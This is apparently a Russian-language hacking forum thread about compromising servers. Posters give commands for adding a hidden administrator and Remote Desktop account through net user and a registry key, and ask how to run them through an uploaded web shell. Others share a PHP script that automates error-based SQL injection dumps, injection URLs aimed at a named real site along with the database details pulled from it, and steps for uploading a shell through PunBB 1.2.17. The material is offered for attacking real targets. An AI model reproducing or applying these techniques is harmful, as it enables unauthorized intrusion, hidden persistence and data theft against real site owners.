учётка для дедика: net user user password /add net localgroup Administrators user /add net localgroup "Remote Desktop Users" user /add net accounts /maxpwage:unlimited скрыть учетку: Для этого заходим в реестер (Пуск > Выполнить > regedit.exe) переходим в HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINE->SOFTWARE->Microsoft->WindowsNT->CurrentVersion->Winlogon->SpecialAccounts->UserList и создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD) Называем этот параметр именем твоего аккаунта,и присваиваем ему численное значение 0. ну и патч для мультиюзерности ставим. ответ 3x'e'orcist так это вроде как палевно,юзер может заметить как ты у него в реестре копаешся предлагаю сразу ключик добавить с cmd: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" \v ИМЯ УЧЁТКИ \t REG_DWORD \d "00000000" \f
Вы походу неправельно меня поняли. Я имел ввиду не как создать учетку на дедике. А как создать учетку через залитый шелл на дедик)
Нет тебе правильно сказали. Напиши рег файл, запихай в автозагрузку и ребуть. Ну или если сможешь выполнить его, то выполняй. Тока через реестр можно добавить.
ммм... я создал .bat файл с содержанием net user логин пасс /add net localgroup Administrators user /add net localgroup "Remote Desktop Users" user /add net accounts /maxpwage:unlimited подскажите в какую папочку его запихнуть что бы после ребута он автоматом запустился?
запусти его сам и все можеш батник удалить,главное не забудь как Strlilo4ka->exor(ist,добавить ключик в реестр...
Имеется инъекция с выводом в ошибке, такого типа 1062 - Duplicate entry '38411' for key 1 . Есть ли софт, который будет дампить значение в ковычках, то есть 3841, так как последний символ отбрасывается? P.S Скуля переберается лимитом, так и софт должен делать +1 лимит. +)
PHP: <?php set_time_limit(0); // убираем ограничение на время исполнения скрипта $count = 10; //сколько записей дампить for($i=0;$i<$count;$i++) // запускаем цикл, каждый раз увеличивая значение limit на единицу, до указанного значения { $vuln_url = "http://127.0.0.1/sql.php?id=2+and+(select+1+from+(select+count(*),concat((select+table_name+from+information_schema.tables+limit+$i,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)"; // уязвимый URL $get_page = file_get_contents($vuln_url); // получаем содержимое страницы $parse = preg_match_all ('#Duplicate entry \'(.*)1\' for key#Uis',$get_page,$out); // парсим значение в ошибке foreach ($out[1] as $result) // перебираем полученный массив вхождений echo $result.'<br>'; //выводим результат } ?> Вот, написал скрипт, все действия прокомментировал, запрос поменяешь под себя.
Походу blind sql http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+ Выдает то же,что по запросу http://www.mirdela.ru/news.php?nid=-351 А если что нибудь убрать,выдаст 2Can not select content Как такую раскрутить?хотя бы версию узнать.
нет там есть вывод. Версия у тебя 4.1.25-log. Я особо не вдавался в подробности, поэтому покажу как я на горячую нашёл. Вот запрос - http://www.mirdela.ru/news.php?nid=351/**/union/**/select/**/version(),version(),version(),version(),version(),version(),version(),version(),version()/* Сделай поиск по 4.1.25-log И увидишь на странице где идёт вывод.
http://www.mirdela.ru/news.php?nid=351+UNION+SELECT+1,2,AES_DECRYPT%28AES_ENCRYPT%28CONCAT_WS%280x3a,Version%28%29,Database%28%29,User%28%29%29,0x71%29,0x71%29,4,5,6,7,8,9-- Version: 4.1.25-log Database: nsk24ru0_realty User: nsk24ru0_realty@localhost колонок 9 а не 10..order by юзай
Заливка шелла в PunBB 1.2.17 admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)
не могу его использовать так как пасс узнал из других источников нежели из базы форума, не знаю префикс..а гадать его долго...
